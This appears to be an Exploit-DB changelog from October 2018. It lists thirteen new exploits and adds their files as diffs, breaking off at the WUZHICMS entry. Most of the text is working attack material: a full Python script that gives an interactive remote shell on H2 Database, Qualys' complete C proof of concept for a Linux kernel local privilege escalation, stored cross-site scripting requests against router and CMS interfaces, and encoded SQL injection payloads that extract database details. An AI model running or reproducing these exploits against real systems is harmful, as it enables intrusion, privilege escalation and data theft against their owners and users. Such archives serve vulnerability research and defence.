DB: 2018-10-02

13 changes to exploits/shellcodes

Snes9K 0.0.9z - Denial of Service (PoC)
Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation
H2 Database 1.4.196 - Remote Code Execution
ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting
Fork CMS 5.4.0 - Cross-Site Scripting
Hotel Booking Engine 1.0 - 'h_room_type' SQL Injection
Education Website 1.0 - 'subject' SQL Injection
Singleleg MLM Software 1.0 - 'msg_id' SQL Injection
Binary MLM Software 1.0 - 'pid' SQL Injection
Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection
WUZHICMS 2.0 - Cross-Site Scripting
Billion ADSL Router 400G 20151105641 - Cross-Site Scripting

exploits/hardware/webapps/45515.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Billion ADSL Router 400G 20151105641 - Cross-Site Scripting
+# Author: Cakes
+# Discovery Date: 2018-09-30
+# Vendor Homepage: http://www.billion.com
+# Software Link: http://billionfirmware.co.za
+# Tested Version: 20151105641
+# Tested on OS: Kali Linux
+# CVE: N/A
+
+# Description:
+# Improper input validation on the  router web interface allows attackers add a persistent 
+# Cross-Site scripting attack on the IP Interface field when adding a new static route. 
+# Simply intercept a new static route request and add in the XSS
+
+# Poc
+
+POST /configuration/edit-list.html HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: http://Target/configuration/edit-list.html
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 93
+
+nodename=&destination=0.0.0.0&netmask=0.0.0.0&gateway=0.0.0.1&interface=<script>alert("Cakes");</script>&cost=1&action=create

exploits/java/webapps/45506.py

@@ -0,0 +1,139 @@
+# Exploit Title: H2 Database 1.4.196 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2018-09-24
+# Exploit Author: h4ckNinja
+# Vendor Homepage: https://www.h2database.com/
+# Software Link: http://www.h2database.com/h2-2018-03-18.zip
+# Version: 1.4.196 and 1.4.197
+# Tested on: macOS/Linux
+# CVE: N/A
+
+# This takes advantage of the CREATE ALIAS RCE (https://www.exploit-db.com/exploits/44422/). 
+# When the test database has a password that is unknown, it is still possible to get the execution 
+# by creating a new database. The web console allows this by entering the name of the new database 
+# in the connection string. When the new database is created, the default credentials of 
+# username “sa” and password “” (blank) are created. The attacker is logged in automatically. 
+# The attached Python code, modified from 44422, demonstrates this.
+
+#!/usr/bin/env python
+
+'''
+Exploit Title: Unauthenticated RCE
+Date: 2018/09/24
+Exploit Author: h4ckNinja
+Vendor: http://www.h2database.com/
+Version: all versions
+Tested on: Linux, Mac
+Description: Building on the Alias RCE, there's an authentication bypass to create a database, and then login to that one.
+Modified from: https://www.exploit-db.com/exploits/44422/
+'''
+
+import random
+import string
+import sys
+import argparse
+import html
+import requests
+
+
+def getSession(host):
+	url = 'http://{}'.format(host)
+	r = requests.get(url)
+	path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp', '.do')
+
+	return '{}/{}'.format(url, path)
+
+def login(url, database):
+	data = {
+		'language': 'en',
+		'setting': 'Generic H2 (Embedded)',
+		'name': 'Generic H2 (Embedded)',
+		'driver': 'org.h2.Driver',
+		'url': database,
+		'user': 'sa',
+		'password': ''
+	}
+
+	print('[*] Attempting to create database')
+	r = requests.post(url, data=data)
+
+	if '<th class="login">Login</th>' in r.text:
+		return False
+
+	print('[+] Created database and logged in')
+
+	return True
+
+def prepare(url):
+	cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : "";  }$$;'''
+	url = url.replace('login', 'query')
+
+	print('[*] Sending stage 1')
+
+	r = requests.post(url, data={'sql': cmd})
+
+	if not 'NullPointerException' in r.text:
+		print('[+] Shell succeeded - ^c or quit to exit')
+		return url
+
+	return False
+
+def execve(url, cmd):
+	r = requests.post(url, data={'sql':"CALL EXECVE('{}')".format(cmd)})
+
+	try:
+		execHTML = html.unescape(r.text.split('</th></tr><tr><td>')[1].split('</td>')[0].replace('<br />','\n').replace('&nbsp;',' ')).encode('utf-8').decode('utf-8','ignore')
+		print(execHTML)
+
+	except Exception as e:
+		print('[-] Invalid command (' + str(e) + ')')
+
+
+if __name__ == "__main__":
+	parser = argparse.ArgumentParser()
+	randString = ''.join(random.choices(string.ascii_letters + string.digits, k=5))
+
+	parser.add_argument('-H',
+			'--host',
+			dest='host',
+			metavar='127.0.0.1:8082',
+			help='Specify a host',
+			required=True)
+
+	parser.add_argument('-d',
+			'--database-url',
+			dest='database',
+			metavar='jdbc:h2:~/emptydb-' + randString,
+			default='jdbc:h2:~/emptydb-' + randString,
+			help='Database URL',
+			required=False)
+
+	args = parser.parse_args()
+
+url = getSession(args.host)
+
+if login(url, args.database):
+	success = prepare(url)
+
+	if success:
+		while True:
+			try:
+				cmd = input('h2-shell$ ')
+
+				if 'quit' not in cmd:
+					execve(success, cmd)
+
+				else:
+					print('[+] Shutting down')
+					sys.exit(0)
+
+			except KeyboardInterrupt:
+				print()
+				print('[+] Shutting down')
+				sys.exit(0)
+
+	else:
+		print('[-] Something went wrong injecting the payload.')
+
+else:
+	print('[-] Unable to login')

exploits/java/webapps/45507.txt

@@ -0,0 +1,30 @@
+# Exploit Title: ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting 
+# Date: 2018-09-26
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.manageengine.com/
+# Hardware Link : https://www.manageengine.com/products/asset-explorer/
+# Software : ZOHO Corp ManageEngine AssetExplorer 6.2.0
+# Product Version: 6.2.0
+# Vulernability Type : Cross-Site Scripting
+# Vulenrability : Stored XSS
+# CVE : N/A
+
+#In Zoho ManageEngine AssetExplorer, a Stored XSS vulnerability was discovered in the 6.2.0 
+# version via the /AssetDef.do ciName or assetName parameter. 
+ 
+# HTTP Request Header :
+
+POST /AssetDef.do HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/AssetDef.do
+Cookie: JSESSIONID=70D4D1E08E51E5401B3E8FE1D17CAE9D; JSESSIONIDSSO=01AE09FF54B9B733107CD17E6D4079D7; sdp=8cb6d209-54e0-41cc-8bb2-1d462c6d3b72; nonitassetslinks=hide; Components=hide; virtual=hide; viewlinks=hide; Softwarediv=hide; barcodeDiv=hide; itassetslinks=show; %5Bobject%20HTMLTableRowElement%5D=hide; %5Bobject%20HTMLTableElement%5D=hide
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 705
+
+typeId=9&ciTypeId=21&ciId=null&ciName=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22ismailtasdelen%22%29%3E&assetName=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22ismailtasdelen%22%29%3E&componentID=301&CI_BaseElement_ATTRIBUTE_302=&CI_BaseElement_IMPACTID=null&ciDescription=&activeStateId=2&isStateChange=&resourceState=1&assignedType=Assign&asset=0&user=0&department=0&leaseStart=&leaseEnd=&site=-1&location=&vendorID=0&assetPrice=0&assetTag=&acqDate=&assetSerialNo=&expDate=&assetBarCode=&warrantyExpDate=&udfName3=&depreciationTypeId=&declinePercent=&usefulLife=&depreciationPercent=&salvageValue=&isProductInfoChanged=&assetID=&previousSite=&addAsset=Save&purchasecost=&modifycost=true&oldAssociatedVendor=

exploits/linux/local/45516.c

@@ -0,0 +1,298 @@
+/*
+EDB-Note: Systems with less than 32GB of RAM are unlikely to be affected by this issue, due to memory demands during exploitation.
+EDB Note: poc-exploit.c 
+*/
+
+/*
+ * poc-exploit.c for CVE-2018-14634
+ * Copyright (C) 2018 Qualys, Inc.
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+#include <limits.h>
+#include <paths.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/resource.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define MAPCOUNT_ELF_CORE_MARGIN        (5)
+#define DEFAULT_MAX_MAP_COUNT   (USHRT_MAX - MAPCOUNT_ELF_CORE_MARGIN)
+
+#define PAGESZ ((size_t)4096)
+#define MAX_ARG_STRLEN ((size_t)128 << 10)
+#define MAX_ARG_STRINGS ((size_t)0x7FFFFFFF)
+
+#define die() do { \
+    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
+    exit(EXIT_FAILURE); \
+} while (0)
+
+int
+main(void)
+{
+    if (sizeof(size_t) != sizeof(uint64_t)) die();
+    const size_t alpha = 512;
+    const size_t sprand = 8192;
+    const size_t beta = (size_t)9 << 10;
+    const size_t items = (size_t)1 << 31;
+    const size_t offset = items * sizeof(uintptr_t);
+
+    #define LLP "LD_LIBRARY_PATH=."
+    static char preload_env[MAX_ARG_STRLEN];
+  {
+    char * const sp = stpcpy(preload_env, "LD_PRELOAD=");
+    char * cp = preload_env + sizeof(preload_env);
+    size_t n;
+    for (n = 1; n <= (size_t)(cp - sp) / sizeof(LLP); n++) {
+        size_t i;
+        for (i = n; i; i--) {
+            *--cp = (n == 1) ? '\0' : (i == n) ? ':' : '0';
+            cp -= sizeof(LLP)-1;
+            memcpy(cp, LLP, sizeof(LLP)-1);
+        }
+    }
+    memset(sp, ':', (size_t)(cp - sp));
+    if (memchr(preload_env, '\0', sizeof(preload_env)) !=
+                    preload_env + sizeof(preload_env)-1) die();
+  }
+    const char * const protect_envp[] = {
+        preload_env,
+    };
+    const size_t protect_envc = sizeof(protect_envp) / sizeof(protect_envp[0]);
+    size_t _protect_envsz = 0;
+  {
+    size_t i;
+    for (i = 0; i < protect_envc; i++) {
+        _protect_envsz += strlen(protect_envp[i]) + 1;
+    }
+  }
+    const size_t protect_envsz = _protect_envsz;
+
+    const size_t scratch_envsz = (size_t)1 << 20;
+    const size_t scratch_envc = scratch_envsz / MAX_ARG_STRLEN;
+    if (scratch_envsz % MAX_ARG_STRLEN) die();
+    static char scratch_env[MAX_ARG_STRLEN];
+    memset(scratch_env, ' ', sizeof(scratch_env)-1);
+
+    const size_t onebyte_envsz = (size_t)256 << 10;
+    const size_t onebyte_envc = onebyte_envsz / 1;
+
+    const size_t padding_envsz = offset + alpha;
+    /***/ size_t padding_env_rem = padding_envsz % MAX_ARG_STRLEN;
+    const size_t padding_envc = padding_envsz / MAX_ARG_STRLEN + !!padding_env_rem;
+    static char padding_env[MAX_ARG_STRLEN];
+    memset(padding_env, ' ', sizeof(padding_env)-1);
+    static char padding_env1[MAX_ARG_STRLEN];
+    if (padding_env_rem) memset(padding_env1, ' ', padding_env_rem-1);
+
+    const size_t envc = protect_envc + scratch_envc + onebyte_envc + padding_envc;
+    if (envc > MAX_ARG_STRINGS) die();
+
+    const size_t argc = items - (1 + 1 + envc + 1);
+    if (argc > MAX_ARG_STRINGS) die();
+
+    const char * const protect_argv[] = {
+        "./poc-suidbin",
+    };
+    const size_t protect_argc = sizeof(protect_argv) / sizeof(protect_argv[0]);
+    if (protect_argc >= argc) die();
+    size_t _protect_argsz = 0;
+  {
+    size_t i;
+    for (i = 0; i < protect_argc; i++) {
+        _protect_argsz += strlen(protect_argv[i]) + 1;
+    }
+  }
+    const size_t protect_argsz = _protect_argsz;
+
+    const size_t padding_argc = argc - protect_argc;
+    const size_t padding_argsz = (offset - beta) - (alpha + sprand / 2 +
+                   protect_argsz + protect_envsz + scratch_envsz + onebyte_envsz / 2);
+    const size_t padding_arg_len = padding_argsz / padding_argc;
+    /***/ size_t padding_arg_rem = padding_argsz % padding_argc;
+    if (padding_arg_len >= MAX_ARG_STRLEN) die();
+    if (padding_arg_len < 1) die();
+    static char padding_arg[MAX_ARG_STRLEN];
+    memset(padding_arg, ' ', padding_arg_len-1);
+    static char padding_arg1[MAX_ARG_STRLEN];
+    memset(padding_arg1, ' ', padding_arg_len);
+
+    const char ** const envp = calloc(envc + 1, sizeof(char *));
+    if (!envp) die();
+  {
+    size_t envi = 0;
+    size_t i;
+    for (i = 0; i < protect_envc; i++) {
+        envp[envi++] = protect_envp[i];
+    }
+    for (i = 0; i < scratch_envc; i++) {
+        envp[envi++] = scratch_env;
+    }
+    for (i = 0; i < onebyte_envc; i++) {
+        envp[envi++] = "";
+    }
+    for (i = 0; i < padding_envc; i++) {
+        if (padding_env_rem) {
+            envp[envi++] = padding_env1;
+            padding_env_rem = 0;
+        } else {
+            envp[envi++] = padding_env;
+        }
+    }
+    if (envi != envc) die();
+    if (envp[envc] != NULL) die();
+    if (padding_env_rem) die();
+  }
+
+    const size_t filemap_size = ((padding_argc - padding_arg_rem) * sizeof(char *) / (DEFAULT_MAX_MAP_COUNT / 2) + PAGESZ-1) & ~(PAGESZ-1);
+    const size_t filemap_nptr = filemap_size / sizeof(char *);
+    char filemap_name[] = _PATH_TMP "argv.XXXXXX";
+    const int filemap_fd = mkstemp(filemap_name);
+    if (filemap_fd <= -1) die();
+    if (unlink(filemap_name)) die();
+  {
+    size_t i;
+    for (i = 0; i < filemap_nptr; i++) {
+        const char * const ptr = padding_arg;
+        if (write(filemap_fd, &ptr, sizeof(ptr)) != (ssize_t)sizeof(ptr)) die();
+    }
+  }
+  {
+    struct stat st;
+    if (fstat(filemap_fd, &st)) die();
+    if ((size_t)st.st_size != filemap_size) die();
+  }
+
+    const char ** const argv = mmap(NULL, (argc + 1) * sizeof(char *), PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+    if (argv == MAP_FAILED) die();
+    if (protect_argc > PAGESZ / sizeof(char *)) die();
+    if (mmap(argv, PAGESZ, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) != argv) die();
+  {
+    size_t argi = 0;
+  {
+    size_t i;
+    for (i = 0; i < protect_argc; i++) {
+        argv[argi++] = protect_argv[i];
+    }
+  }
+  {
+    size_t n = padding_argc;
+    while (n) {
+        void * const argp = &argv[argi];
+        if (((uintptr_t)argp & (PAGESZ-1)) == 0) {
+            if (padding_arg_rem || n < filemap_nptr) {
+                if (mmap(argp, PAGESZ, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) != argp) die();
+            } else {
+                if (mmap(argp, filemap_size, PROT_READ, MAP_FIXED | MAP_PRIVATE, filemap_fd, 0) != argp) die();
+                argi += filemap_nptr;
+                n -= filemap_nptr;
+                continue;
+            }
+        }
+        if (padding_arg_rem) {
+            argv[argi++] = padding_arg1;
+            padding_arg_rem--;
+        } else {
+            argv[argi++] = padding_arg;
+        }
+        n--;
+    }
+  }
+    if (argi != argc) die();
+    if (argv[argc] != NULL) die();
+    if (padding_arg_rem) die();
+  }
+
+  {
+    static const struct rlimit stack_limit = {
+        .rlim_cur = RLIM_INFINITY,
+        .rlim_max = RLIM_INFINITY,
+    };
+    if (setrlimit(RLIMIT_STACK, &stack_limit)) die();
+  }
+    execve(argv[0], (char * const *)argv, (char * const *)envp);
+    die();
+}
+
+/*
+EDB Note: EOF poc-exploit.c 
+*/
+
+
+
+
+/*
+EDB Note: poc-suidbin.c
+*/
+
+
+/*
+ * poc-suidbin.c for CVE-2018-14634
+ * Copyright (C) 2018 Qualys, Inc.
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define die() do { \
+    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
+    exit(EXIT_FAILURE); \
+} while (0)
+
+int
+main(const int argc, const char * const * const argv, const char * const * const envp)
+{
+    printf("argc %d\n", argc);
+
+    char stack = '\0';
+    printf("stack %p < %p < %p < %p < %p\n", &stack, argv, envp, *argv, *envp);
+
+    #define LLP "LD_LIBRARY_PATH"
+    const char * const llp = getenv(LLP);
+    printf("getenv %p %s\n", llp, llp);
+
+    const char * const * env;
+    for (env = envp; *env; env++) {
+        if (!strncmp(*env, LLP, sizeof(LLP)-1)) {
+            printf("%p %s\n", *env, *env);
+        }
+    }
+    exit(EXIT_SUCCESS);
+}
+
+/*
+EDB Note: EOF poc-suidbin.c
+*/

exploits/php/webapps/45508.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Fork CMS 5.4.0 - Cross-Site Scripting
+# Date: 2018-09-26 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.fork-cms.com/
+# Software Link : https://github.com/forkcms/forkcms
+# Software : Fork 5.4.0
+# Product Version: 5.4.0
+# Vulernability Type : Code Injection
+# Vulenrability : HTML Injection and Stored XSS
+
+# In the 5.4.0 version of the Fork CMS software, HTML Injection and Stored XSS vulnerabilities 
+# were discovered via the /backend/ajax URI.
+
+# HTTP POST Request :
+
+POST /backend/ajax HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: https://Target/private/en/pages/add?token=2quwpxbx78
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 299
+Cookie: track=s%3A32%3A%22e36b0c664ad21e30c493893c3612f5cc%22%3B; PHPSESSID=1103079034ec4a8e726bea6a0746731e; interface_language=en; frontend_language=en; track=1; jstree_open=page-425
+Connection: close
+
+fork%5Bmodule%5D=Core&fork%5Baction%5D=GenerateUrl&fork%5Blanguage%5D=en&url=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&metaId=&baseFieldName=title&custom=1&className=Backend%5CModules%5CPages%5CEngine%5CModel&methodName=getUrl&parameters=a%3A3%3A%7Bi%3A0%3Bi%3A0%3Bi%3A1%3Bi%3A0%3Bi%3A2%3Bb%3A0%3B%7D

exploits/php/webapps/45509.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Hotel Booking Engine 1.0 - 'h_room_type' SQL Injection
+# Dork: N/A
+# Exploit Author: Ihsan Sencan
+# Date: 2018-10-01
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/products/details/35
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-N/A
+
+# POC: 
+# http://localhost/[PATH]/hotels?h_room_type=[SQL]
+
+%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%45%66%65
+
+# http://localhost/[PATH]/hotels?destination=[SQL]
+
+' AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT((SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'efe'='efe

exploits/php/webapps/45510.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Education Website 1.0 - 'subject' SQL Injection
+# Dork: N/A
+# Date: 2018-10-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/products/details/34
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# http://localhost/[PATH]/college_list.html?subject=[SQL]
+
+-7'+/*!11111UNION*/(/*!11111SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
+ 
+# http://localhost/[PATH]/college_list.html?city=[SQL]
+ 
+'+/*!44444UNION*/(/*!44444SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!44444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
+ 
+# http://localhost/[PATH]/college_list.html?country=[SQL]
+ 
+'+/*!22222UNION*/(/*!22222SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-

exploits/php/webapps/45511.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Singleleg MLM Software 1.0 - 'msg_id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://mlmsoftwarez.in/
+# Software Link: http://mlmdemo.biz/singleleg/root.html
+# Software Link: http://mlmdemo.biz/autopool/root.html
+# Software Link: http://mlmdemo.biz/gift/root.html
+# Software Link: http://mlmdemo.biz/investment/root.html
+# Software Link: http://mlmdemo.biz/bidding/root.html
+# Software Link: http://mlmdemo.biz/adclicking/root.html
+# Software Link: http://mlmdemo.biz/repurchase/root.html
+# Software Link: http://mlmdemo.biz/moneyorderplan/root.html
+# Software Link: http://mlmdemo.biz/level/root.html
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# Affected Products: Singleleg MLM Software 1.0, Autopool MLM Software 1.0, Gift MLM Software 1.0
+# Investmen MLM Software 1.0, Bidding MLM Software 1.0, ADD Clicking MLM Software 1.0
+# Repurchase MLM Software 1.0, Moneyorder MLM Software 1.0, Level MLM Software 1.0
+# CVE: N/A
+
+# POC: 
+# http://localhost/[PATH]/member/readmsg.php?msg_id=[SQL]
+
+%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d

exploits/php/webapps/45512.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Binary MLM Software 1.0 - 'pid' SQL Injection
+# Dork: N/A
+# Date: 2018-10-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://mlmsoftwarez.in/
+# Software Link: http://mlmdemo.biz/binary/root.html
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# http://localhost/[PATH]/member/tree.php?pid=[SQL]
+
+%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d

exploits/php/webapps/45513.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection
+# Dork: N/A
+# Date: 2018-10-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/products/details/15
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# http://localhost/[PATH]/site-search?sortBy=date_started[SQL]
+ 
+%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%31%31%39%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%29%29
+
+# http://localhost/[PATH]/site-search?sortDir=desc[SQL]
+ 
+%2c%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29

exploits/php/webapps/45514.txt

@@ -0,0 +1,16 @@
+# Title: WUZHICMS 2.0 - Cross-Site Scripting 
+# Author: Felipe "Renzi" Gabriel
